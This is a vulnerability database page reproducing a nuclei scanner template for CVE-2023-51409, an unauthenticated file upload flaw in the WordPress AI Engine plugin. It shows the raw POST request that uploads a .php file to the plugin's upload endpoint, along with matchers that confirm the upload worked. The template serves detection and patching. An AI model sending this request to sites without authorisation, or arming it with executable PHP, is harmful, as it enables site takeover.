Lucene search
K

Jordy Meow AI Engine - Unrestricted File Upload

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

Unrestricted File Upload vulnerability in Jordy Meow AI Engine affecting versions up to 1.9.98.

Related
Refs
Code
id: CVE-2023-51409

info:
  name: Jordy Meow AI Engine - Unrestricted File Upload
  author: pussycat0x
  severity: critical
  description: |
    Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine- ChatGPT Chatbot.This issue affects AI Engine- ChatGPT Chatbot- from n/a through 1.9.98.
  impact: |
    Unauthenticated attackers can upload files of dangerous types without restriction, potentially leading to remote code execution and complete system compromise.
  remediation: |
    Update AI Engine plugin to version 1.9.99 or later.
  reference:
    - https://github.com/Nxploited/CVE-2023-51409
    - https://github.com/RandomRobbieBF/CVE-2023-51409
    - https://patchstack.com/database/vulnerability/ai-engine/wordpress-ai-engine-plugin-1-9-98-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2023-51409
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-51409
    cwe-id: CWE-434
    epss-score: 0.65046
    epss-percentile: 0.99153
    cpe: cpe:2.3:a:meowapps:ai_engine:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: meowapps
    product: ai_engine
    framework: wordpress
    publicwww-query: "/wp-content/plugins/ai-engine/"
  tags: cve,cve2023,wp,wordpress,wp-plugin,ai-engine,intrusive,vkev,vuln,ai

variables:
  filename: "{{to_lower(rand_text_alpha(7))}}"

http:
  - raw:
      - |
        POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Content-Type: multipart/form-data; boundary=7b22c609c9ce879dadf1494f0a6b2071

        --7b22c609c9ce879dadf1494f0a6b2071
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: text/plain

        {{randstr}}.txt
        --7b22c609c9ce879dadf1494f0a6b2071--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '{{filename}}.php'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220565a155db80fa1cf46db4d902282c8a69ae3d42d94cdc63da1674fe1069430be02202b355a63411fc07dd0cdb643429b94fa5556612af241b67f648051b0147e0616:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8 - 10
EPSS0.65046
SSVC
42